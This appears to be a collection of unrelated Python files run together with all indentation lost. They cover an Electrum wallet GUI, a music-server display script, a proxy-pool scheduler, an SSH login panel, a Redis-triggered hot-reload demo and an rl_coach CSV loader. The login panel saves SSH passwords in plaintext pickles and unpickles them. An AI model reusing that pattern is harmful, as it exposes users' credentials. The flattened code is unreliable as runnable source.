if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
backup_dir = util.android_backup_dir()
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
def lightning_status(self):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
status = _('Enabled')
else:
status = _('Enabled, non-recoverable channels')
else:
if self.wallet.can_have_lightning():
status = _('Not enabled')
else:
status = _("Not available for this wallet.")
return status
def on_lightning_status(self, root):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
pass
else:
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
self.show_info(msg)
elif self.wallet.can_have_lightning():
root.dismiss()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
d = Question(msg, self._enable_lightning, title=_('Enable Lightning?'))
d.open()
def _enable_lightning(self, b):
if not b:
return
self.wallet.init_lightning(password=self.password)
self.show_info(_('Lightning keys have been initialized.'))
|
sb.py
|
#!/usr/bin/python3
from LMSTools import LMSServer, LMSPlayer, LMSTags as tags
from time import sleep
import requests
import textwrap
import re
#import numpy as np
from datetime import datetime
from evdev import InputDevice, categorize, ecodes
from threading import Thread
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
############## CHANGE ME! ###################
SERVER = '192.168.68.121' # ip address of Logitech Media Server
PORT = '9000'
PLAYER = 'RME Coax'
###### I/O devices may be different on your setup #####
###### can optionally use numpy to write to fb ########
#h, w, c = 320, 480, 4
#fb = np.memmap('/dev/fb0', dtype='uint8',mode='w+',shape=(h,w,c))
fbw, fbh = 480, 320 # framebuffer dimensions
fb = open("/dev/fb0", "wb") # framebuffer device
###### Touchscreen input device ######
dev = InputDevice('/dev/input/event0')
#######################################################
fonts = []
fonts.append( ImageFont.truetype('/usr/share/fonts/truetype/oswald/Oswald-Bold.ttf', 24) )
fonts.append( ImageFont.truetype('/usr/share/fonts/truetype/oswald/Oswald-Light.ttf', 20) )
fonts.append( ImageFont.truetype('/usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf', 30) )
fonts.append( ImageFont.truetype('/usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf', 144) )
## Touchscreen event worker thread
def event_thread():
for event in dev.read_loop():
if event.type == ecodes.EV_KEY:
absevent = categorize(event)
if absevent.event.value == 0:
handle_event(dev)
## Red and Blue color channels are reversed from normal RGB on pi framebuffer
def swap_redblue(img):
"Swap red and blue channels in image"
r, g, b, a = img.split()
return Image.merge("RGBA", (b, g, r, a))
## Paint image to screen at position
def blit(img, pos):
size = img.size
w = size[0]
h = size[1]
x = pos[0]
y = pos[1]
### to use numpy, uncomment...
# n = np.array(img)
# n[:,:,[0,1,2]] = n[:,:,[2,1,0]]
# fb[y:y+h,x:x+w] = n
### ... and comment all below
img = swap_redblue(img)
try:
fb.seek(4 * ((pos[1]) * fbw + pos[0]))
except Exception as e:
print("seek error: ", e)
iby = img.tobytes()
for i in range(h):
try:
fb.write(iby[4*i*w:4*(i+1)*w])
fb.seek(4 * (fbw - w), 1)
except Exception as e:
break
## Display date and time when idle
def displaydatetime(force):
if not force:
sec = datetime.now().second
if sec not in {0,15,30,45}:
return
dt = datetime.today().strftime('%a, %d %B %Y')
tm = datetime.today().strftime('%H:%M')
img = Image.new('RGBA',(480, 320))
draw = ImageDraw.Draw(img)
draw.text((20,10), tm, (255,255,255),font=fonts[3])
draw.text((65,200), dt, (255,255,255),font=fonts[2])
blit(img,(0,0))
## Red song progress line
def displayprogress(seek, duration):
if duration > 0:
progress = seek / duration * 480
else:
progress = 0
img = Image.new('RGBA', (480, 6))
draw = ImageDraw.Draw(img)
draw.line((0,0,progress,0),fill='red',width=6)
blit(img,(0,44))
## Display artist, song title, album title
def displaymeta(data):
img = Image.new('RGBA',size=(210,270),color=(0,0,0,255))
tw1 = textwrap.TextWrapper(width=30)
tw2 = textwrap.TextWrapper(width=30)
s = "\n"
try:
artist = data['artist']
except:
artist = ""
try:
title = data['title']
except:
title = ""
try:
album = data['album']
except:
album = ""
if album == "":
try:
album = data['remote_title']
except:
pass
artist = s.join(tw2.wrap(artist)[:6])
album = s.join(tw2.wrap(album)[:6])
draw = ImageDraw.Draw(img)
draw.text((10,0), artist, (191,245,245),font=fonts[1])
draw.text((10,165), album, (255,255,255),font=fonts[1])
blit(img,(270,50))
img = Image.new('RGBA',size=(480,50),color=(0,0,0,255))
draw = ImageDraw.Draw(img)
draw.text((0,0), title, (255,255,255),font=fonts[0])
blit(img,(0,0))
## Get album cover and display
def getcoverart(url):
try:
img = Image.open(requests.get(url, stream=True).raw)
img = img.resize((270,270))
img = img.convert('RGBA')
blit(img,(0,50))
except Exception as e:
print(e)
pass
## Handle touchscreen events
def handle_event(dev):
global player,loop,session
x1 = dev.absinfo(ecodes.ABS_X).value
y1 = dev.absinfo(ecodes.ABS_Y).value
x=int((y1/3850)*480)
y=int((x1/3850)*320)
try:
if x >= 286:
player.next()
print("next")
elif x>143 and x <286:
player.toggle()
print("play/pause")
else:
player.prev()
print("prev")
except Exception as e:
print(e)
pass
nowplaying = ''
old_nowplaying = ''
cover_url = ''
old_url = ''
old_playing = False
seek = 0
duration = 0
progress = 0
playing = False
## Start event handler thread
t = Thread(target=event_thread)
t.start()
## Init the screen
displaydatetime(True)
## Init LMS server and player
server = LMSServer(SERVER)
players = server.get_players()
for p in players:
if p.name == PLAYER:
print(p)
player = p
break
#player = LMSPlayer(PLAYER, server)
nowplaying = ''
old_playing = True
old_nowplaying = ''
cover_url = ''
detail = []
taglist = [tags.ARTIST, tags.COVERID, tags.DURATION, tags.COVERART, tags.ARTWORK_URL, tags.ALBUM, tags.REMOTE_TITLE, tags.ARTWORK_TRACK_ID]
## Main loop - wait for player events, handle them
while True:
try:
playing = (player.mode == "play")
except:
playing = False
if playing:
detail = player.playlist_get_current_detail(amount=1,taglist=taglist)[0]
try:
if 'artwork_url' in detail:
artwork_url = detail['artwork_url']
if not artwork_url.startswith('http'):
if artwork_url.startswith('/'):
artwork_url = artwork_url[1:]
cover_url = 'http://{}:{}/{}'.format(SERVER,PORT,artwork_url)
else:
cover_url = artwork_url
else:
cover_url='http://{}:{}/music/{}/cover.jpg'.format(SERVER,PORT,detail['artwork_track_id'])
except Exception as e:
print(e)
nowplaying = detail['title']
try:
seek = player.time_elapsed
except Exception as e:
seek = 0
try:
duration = player.track_duration
except Exception as e:
duration = 0
if not playing:
displaydatetime(False)
old_playing = playing
detail = []
elif playing and seek > 3:
try:
displayprogress(seek,duration)
except Exception as e:
progress = 0
if playing != old_playing:
old_playing = playing
if playing:
displayprogress(seek,duration)
getcoverart(cover_url)
displaymeta(detail)
else:
displaydatetime(False)
if nowplaying != old_nowplaying or cover_url != old_url:
old_nowplaying = nowplaying
old_url = cover_url
if playing:
getcoverart(cover_url)
displaymeta(detail)
else:
displaydatetime(False)
sleep(1)
|
ProxyRefreshSchedule.py
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
"""
-------------------------------------------------
File Name: ProxyRefreshSchedule.py
Description : 代理定时刷新
Author : JHao
date: 2016/12/4
-------------------------------------------------
Change Activity:
2016/12/4: 代理定时刷新
2017/03/06: 使用LogHandler添加日志
2017/04/26: raw_proxy_queue验证通过但useful_proxy_queue中已经存在的代理不在放入
-------------------------------------------------
"""
import sys
import time
import logging
from threading import Thread
from apscheduler.schedulers.background import BackgroundScheduler
from Util.GetConfig import config
sys.path.append('../')
from Util.utilFunction import validUsefulProxy
from Manager.ProxyManager import ProxyManager
from Util.LogHandler import LogHandler
__author__ = 'JHao'
logging.basicConfig()
class ProxyRefreshSchedule(ProxyManager):
"""
代理定时刷新
"""
def __init__(self):
ProxyManager.__init__(self)
self.log = LogHandler('refresh_schedule')
def validProxy(self):
"""
验证raw_proxy_queue中的代理, 将可用的代理放入useful_proxy_queue
:return:
"""
self.db.changeTable(self.raw_proxy_queue)
raw_proxy_item = self.db.pop()
# self.log.info('ProxyRefreshSchedule: [%s] 开始验证 raw_proxy' % time.ctime())
# 计算剩余代理,用来减少重复计算
remaining_proxies = self.getAll()
while raw_proxy_item:
raw_proxy = raw_proxy_item.get('proxy')
if isinstance(raw_proxy, bytes):
# 兼容Py3
raw_proxy = raw_proxy.decode('utf8')
if raw_proxy not in remaining_proxies:
if validUsefulProxy(raw_proxy):
self.db.changeTable(self.useful_proxy_queue)
self.db.put(raw_proxy)
# self.log.info('ProxyRefreshSchedule: %s validation pass' % raw_proxy)
else:
# self.log.info('ProxyRefreshSchedule: 验证 raw_proxy 失败: %s' % raw_proxy)
pass
else:
# self.log.info('ProxyRefreshSchedule: raw_proxy 已添加: {}'.format((raw_proxy)))
pass
self.db.changeTable(self.raw_proxy_queue)
raw_proxy_item = self.db.pop()
remaining_proxies = self.getAll()
# self.log.info('ProxyRefreshSchedule: [%s] 验证 raw_proxy 完毕' % time.ctime())
def refreshPool():
pp = ProxyRefreshSchedule()
pp.validProxy()
def batchRefresh(process_num=config.refresh_process_num):
"""
创建指定个数线程, 执行 refreshPool
- 间隔执行的任务.
"""
# 检验新代理
pl = []
for num in range(process_num):
proc = Thread(target=refreshPool, args=())
pl.append(proc)
for num in range(process_num):
pl[num].daemon = True
pl[num].start()
for num in range(process_num):
pl[num].join()
def fetchAll():
"""
根据配置文件, 获取新代理.
- 间隔执行的任务.
"""
p = ProxyRefreshSchedule()
p.db.changeTable(p.useful_proxy_queue)
if config.max_limit == 0 or p.db.getNumber() < config.max_limit:
# 获取新代理
p.refresh()
else:
p.log.fatal('有效代理到达最大数目, 暂停获取')
def run():
scheduler = BackgroundScheduler()
# 不用太快, 网站更新速度比较慢, 太快会加大验证压力, 导致raw_proxy积压
scheduler.add_job(fetchAll, 'interval', seconds=config.fetch_interval, id="fetch_proxy", max_instances=1)
scheduler.add_job(batchRefresh, "interval", seconds=config.refresh_interval, max_instances=1) # 每分钟检查一次
scheduler.start()
fetchAll()
while True:
time.sleep(3)
if __name__ == '__main__':
run()
|
login.py
|
from tkinter import *
from pickle import dump, load
from tkinter.ttk import *
from time import sleep
import tkinter.messagebox as tkMessageBox
import threading
import paramiko
import Pmw
import os
from datetime import datetime
class Login:
def __init__(self, parent, parameters, all):
parent.__init__
self.parent = parent
self.allunits = all
self.parameters = parameters
self.parameters['Login']['cluster']= 0
self.sAddress = StringVar()
self.p = self.params()
self.username = StringVar()
self.password = StringVar()
self.checkb = IntVar()
self.server = None
self.abqLicense_on = False
self.licenseThread = None
self.cwd = os.getcwd()
if self.p['checkb']:
self.username.set(self.p['username'])
self.password.set(self.p['password'])
self.checkb.set(self.p['checkb'])
self.sAddress.set(self.p['server'])
self.parameters['Login']['server']=self.p['server']
else:
self.username.set('')
self.password.set('')
self.license = StringVar()
self.license.set('--')
self.LoginFrame = LabelFrame(parent, text='Login')
self.user = Frame(self.LoginFrame, borderwidth=2, relief='groove')
self.user.grid(row=0, column=0, padx=5)
self.labelUsername = Label(self.user, text = 'Username:')
self.labelUsername.grid(row=0, column=0, sticky= 'E')
self.labelPassword = Label(self.user, text = 'Password:')
self.labelPassword.grid(row=1, column=0, sticky='E')
self.entryUser = Entry(self.user, textvariable=self.username)
self.entryUser.grid(row=0, column=1, columnspan=2, sticky='WE')
self.entryPass= Entry(self.user, show='*', textvariable=self.password)
self.entryPass.grid(row=1, column=1, columnspan=2, sticky='WE')
self.cbutton = Checkbutton(self.user, text = "Remember me", variable=self.checkb)
self.cbutton.grid(row=2, column=0, sticky='E')
#lgbutton = Button(self.use, text= self.buttonl.get(), command=self.buttonPress)
self.lgibutton = Button(self.user, text= 'Login', command=self.buttonLogin)
self.lgibutton.grid(row=2, column=1, sticky='W')
self.lgobutton = Button(self.user, text= 'Logout', command=self.buttonLogout, state = 'disabled')
self.lgobutton.grid(row=2, column=2, sticky='E')
self.display = Frame(self.LoginFrame, borderwidth=2, relief='groove')
self.display.grid(row=1, column=0, ipady=12, padx=5, sticky='wens')
self.radio_var = IntVar()
self.radios = []
for radio, i in zip(('Run computations on PC', 'Run computations on cluster'), (0, 1)):
r = Radiobutton(self.display, text=radio, variable=self.radio_var, value=i, command=self.switchmode)
r.grid(row=i, columnspan=2, sticky='w')
self.radios.append(r)
self.radios[1].config(state='disabled')
self.labelLicense = Label(self.display, text = 'ABAQUS license:')
self.labelLicense.grid(row=3, column=0, sticky= 'w', padx=12)
self.showLicense = Label(self.display, text = self.license.get())
self.showLicense.grid(row=3, column=1, sticky= 'w', padx=12)
def pack(self, side='top', fill=None, expand=None, padx=0, pady=0):
self.LoginFrame.pack(side=side, fill=fill, expand=expand, padx=padx, pady=pady)
def switchmode(self):
self.parameters['Login']['cluster']=self.radio_var.get()
def buttonLogin(self):
if 'server' in self.parameters['Login'].keys() and self.parameters['Login']['server']:
self.lgibutton.config(state='disabled')
self.lgobutton.config(state='normal')
try:
server = paramiko.Transport((self.parameters['Login']['server'], 22))
server.connect(username=self.username.get(), password=self.password.get())
self.server = server
if self.checkb.get():
self.p = {'username': self.username.get(), 'password':self.password.get(), 'checkb':self.checkb.get(), 'server':self.sAddress.get()}
f = open('%s/login.txt' % self.cwd, 'wb')
dump(self.p, f)
f.close()
else:
self.p = {'username': '', 'password':'', 'checkb':0, 'server':''}
f = open('%s/login.txt' % self.cwd, 'wb')
dump(self.p, f)
f.close()
self.abqLicense_on=True
self.licenseThread = threading.Thread(target=self.abqLicense)
self.licenseThread.start()
self.radios[1].config(state='normal')
except:
self.lgobutton.config(state='disabled')
self.lgibutton.config(state='normal')
tkMessageBox.showerror(title='Error', message="Login fail! Please check the username and password as well as the setting about the server." )
else:
self.setServer()
def abqLicense(self):
while self.abqLicense_on:
try:
channel = self.server.open_session()
try:
channel.exec_command('cat output')
output = channel.makefile('rb', -1).readlines()
if output[1] == 'Viewer licenses:\n':
for i in output:
if 'available.' in i.split():
available = int(i.split()[-4])
if 'issued:' in i.split():
issued = int(i.split()[-1])
total = available+issued
self.showLicense.config(text="%d / %d licenses available" % (available, total))
#self.license.set("%d / %d" % (available, total))
sleep(1)
except:
pass
except:
self.lgobutton.config(state='disabled')
self.lgibutton.config(state='normal')
self.abqLicense_on=False
self.server.close()
self.showLicense.config(text="--")
self.radios[1].config(state='disabled')
self.radio_var.set(0)
if self.allunits['Control'].Optimize.cget('text') != " Start \nOptimization" and self.radio_var.get():
self.allunits['Control'].start()
tkMessageBox.showerror(title='Error', message="The connection with the server has been lost!. The optimization has been stopped automatically. (%s)" % str(datetime.now()))
else:
tkMessageBox.showerror(title='Error', message="The connection with the server has been lost!")
def buttonLogout(self):
if self.allunits['Control'].ResultWidget and self.allunits['Control'].ResultWidget.switch and self.allunits['Control'].ResultWidget.cluster:
tkMessageBox.showerror(title='Error', message="Optimization (cluster mode) is still running! Please stop the optimization first." )
else:
self.lgobutton.config(state='disabled')
self.lgibutton.config(state='normal')
self.abqLicense_on=False
self.server.close()
self.showLicense.config(text="--")
self.radios[1].config(state='disabled')
self.radio_var.set(0)
def params(self):
try:
f = open('login.txt', 'rb')
except IOError:
p = {'username': '', 'password':'', 'checkb': 0, 'server':''}
else:
p = load(f)
f.close()
return p
def setServer(self):
self.SetServer = Pmw.Dialog(self.parent,
buttons=('OK', 'Cancel'),
command = self.actionSetServer)
self.Instruction = Label(self.SetServer.interior(), text="Input the name or the IP address of the server:")
self.Instruction.pack()
self.SAddress = Entry(self.SetServer.interior(), textvariable=self.sAddress)
self.SAddress.pack()
def actionSetServer(self, result):
if result == 'OK':
self.parameters['Login']['server']=self.sAddress.get()
self.SetServer.destroy()
if __name__ == "__main__":
root = Tk()
login = Login(root, None)
root.mainloop()
|
__init__.py
|
# -*- coding: utf-8 -*-
import threading
import sys
from PyQt5 import QtWidgets
from updateServer.HotUpdate import myfunction
import redis
import random
import importlib
from updateServer.HotUpdate.HotFixSample import Ui_MainWindow
class MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.setupUi(self)
self.fun = importlib.import_module("myfunction")
self.pushButton.clicked.connect(self.runFunction)
self.pushButton_2.clicked.connect(self.hotfix)
self.ip = "47.101.195.58"
self.redisport = 2017
self.redis_manager = redis.StrictRedis(self.ip, port=self.redisport)
# self.textBrowser.append(str(sys.modules))
print(sys.modules)
self.tunnel = self.redis_manager.pubsub()
self.tunnel.subscribe(["update"])
self.threads = []
self.t1 = threading.Thread(target=self.autoReload, )
self.threads.append(self.t1)
self.threads[0].setDaemon(True)
self.threads[0].start()
def autoReload(self):
for k in self.tunnel.listen():
if k.get('data') == b'reload':
self.hotfix()
def runFunction(self):
version = self.fun.AllFunction().version
self.textBrowser.append("功能运行,当前版本为:" + version)
for i in range(4):
x = random.randint(-454, 994)
y = random.randint(-245, 437)
self.textBrowser.append(str(x) + "\tfunction version {}\t".format(version) + str(y) + " = " + str(
self.fun.AllFunction().second(x, y)))
# self.textBrowser.append(self.fun.AllFunction().first())
def hotfix(self):
del sys.modules["myfunction"]
self.fun = importlib.import_module('myfunction')
self.textBrowser.append("热更新完毕")
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
mainWindow = MainWindow()
mainWindow.show()
sys.exit(app.exec_())
|
signals_files_group.py
|
#
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from multiprocessing import Process, Manager
from os.path import basename
import pandas as pd
from rl_coach.dashboard_components.globals import x_axis_options, add_directory_csv_files, show_spinner, x_axis
from rl_coach.dashboard_components.signals_file_base import SignalsFileBase
from rl_coach.dashboard_components.signals_file import SignalsFile
class SignalsFilesGroup(SignalsFileBase):
def __init__(self, csv_paths, plot=None):
super().__init__(plot)
self.full_csv_paths = csv_paths
self.signals_files = []
if len(csv_paths) == 1 and os.path.isdir(csv_paths[0]):
self.signals_files = [SignalsFile(str(file), load=False, plot=plot) for file in add_directory_csv_files(csv_paths[0])]
else:
for csv_path in csv_paths:
if os.path.isdir(csv_path):
self.signals_files.append(SignalsFilesGroup(add_directory_csv_files(csv_path), plot=plot))
else:
self.signals_files.append(SignalsFile(str(csv_path), load=False, plot=plot))
parent_directory_path = os.path.abspath(os.path.join(os.path.dirname(csv_paths[0]), '..'))
if len(os.listdir(parent_directory_path)) == 1:
# get the parent directory name (since the current directory is the timestamp directory)
self.dir = parent_directory_path
else:
# get the common directory for all the experiments
self.dir = os.path.dirname('/'.join(os.path.commonprefix(csv_paths).split('/')[:-1]) + '/')
self.filename = '{} - Group({})'.format(basename(self.dir), len(self.signals_files))
self.signal_files_need_update = False
self.load()
def load_csv(self):
global x_axis
# load the csv's for all workers
processes = []
results = Manager().dict()
corrupted_files_idx = []
for idx, signal_file in enumerate(self.signals_files):
if not isinstance(signal_file, SignalsFilesGroup):
processes.append(Process(target=signal_file.load_csv, args=(idx, results)))
processes[-1].start()
[p.join() for p in processes]
# load csv's for SignalsFilesGroup serially for now. TODO: we should later parallelize this as well.
for idx, signal_file in enumerate(self.signals_files):
if isinstance(signal_file, SignalsFilesGroup):
signal_file.load_csv()
for idx, signal_file in enumerate(self.signals_files):
if len(list(results.keys())) > 0:
signal_file.csv, signal_file.last_modified = results[idx]
if not all(option in signal_file.csv.keys() for option in x_axis_options):
print("Warning: {} file seems to be corrupted and does contain the necessary columns "
"and will not be rendered".format(signal_file.filename))
corrupted_files_idx.append(idx)
# remove corrupted worker files
for file_idx in corrupted_files_idx:
del self.signals_files[file_idx]
# get the stats of all the columns
if len(self.signals_files) > 1:
transformed_signals_files = []
subsampling = None
for idx in range(len(self.signals_files)):
transformed_signals_files.append(self.signals_files[idx].csv.copy(deep=True))
# change the index to be the currently selected x axis
transformed_signals_files[-1].index = transformed_signals_files[-1][x_axis[0]]
# remove all duplicate index rows
transformed_signals_files[-1] = transformed_signals_files[-1][~transformed_signals_files[-1].index.duplicated()]
# fill up missing row indices. we are going to take the mean over the group and we want to make sure
# the entire group has some value for every possible index.
num_rows = int(transformed_signals_files[-1].index.values[-1])
transformed_signals_files[-1] = transformed_signals_files[-1].reindex(range(num_rows))
transformed_signals_files[-1].interpolate(inplace=True)
# sub sample the csv to max of 5000 indices (do the same subsampling to all files)
if subsampling is None:
subsampling = max(1, num_rows // 5000)
transformed_signals_files[-1] = transformed_signals_files[-1].iloc[::subsampling, :]
csv_group = pd.concat([signals_file for signals_file in transformed_signals_files])
columns_to_remove = [s for s in csv_group.columns if '/Stdev' in s] + \
[s for s in csv_group.columns if '/Min' in s] + \
[s for s in csv_group.columns if '/Max' in s]
for col in columns_to_remove:
del csv_group[col]
csv_group = csv_group.groupby(csv_group.index)
self.csv_mean = csv_group.mean()
self.csv_mean.columns = [s + '/Mean' for s in self.csv_mean.columns]
self.csv_stdev = csv_group.std()
